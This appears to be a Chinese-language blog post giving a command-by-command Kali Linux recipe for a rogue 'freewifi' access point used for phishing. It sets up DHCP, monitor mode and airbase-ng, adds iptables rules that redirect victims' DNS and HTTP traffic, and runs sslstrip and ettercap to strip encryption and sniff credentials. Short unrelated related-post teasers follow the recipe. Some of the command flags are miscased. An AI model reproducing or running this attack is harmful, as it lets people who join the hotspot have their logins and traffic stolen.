kali2 0建立wifi熱點釣魚

2021-07-12 03:36:22 字數 1297 閱讀 7884

安裝isc-dhcp-server

修改dhcpd.conf為如下:

authoritative;

default-lease-time 700;

max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0

然後啟用網絡卡至監聽模式:

airmon-ng start wlan0

airbase-ng -e freewifi -c 6 wlan0mon

此時虛擬wifi的訊號已經傳送出去了,如果出現錯誤:

error: got channel -1, expected a value > 0.

執行如下命令:

airmon-ng stop wlan0mon

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

然後從啟用網絡卡至監聽模式那裡重新開始。

接著執行如下命令:

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0

ifconfig at0 mtu 1400

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -a prerouting -p udp -j dnat --to 192.168.1.1

iptables -p forward accept

iptables -t nat -a prerouting -p tcp --destination-port 80 -j redirect --to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

虛擬wifir熱點建立成功,接下來就是嗅探欺騙釣魚了:

sslstrip -fpk 10000

ettercap -tpuqi at0

為了方便使用做了乙個指令碼,內容如下:

Kali2 0安裝後配置

1.更新源 備份軟體源sources.list檔案,然後修改sources.list檔案,在終端輸入 gedit etc apt sources.list 官方源 deb kali main non free contrib deb src kali main non free contrib de...

kali 2 0 啟動metasploit服務

kali 2.0 已經沒有metasploit 這個服務了,所以service metasploit start 的方式不起作用。在kali 2.0中啟動帶資料庫支援的msf方式如下 首先啟動postgresql資料庫 etc init.d postgresql start 或者 service p...

kali2 0怎麼安裝dnsdict6?

最近兩天在學習有關dns的資訊收集工具,發現不少好用的工具,例如 dnsenum,dnsrecon,fierce等。看到網上推薦 dnsdict6這個工具,但發現新版的 kali 上竟然沒有這個命令 在虛擬機器直接wget 沒想到出現證書錯誤。最後 tar zvxf thc ipv6 2.7.tar...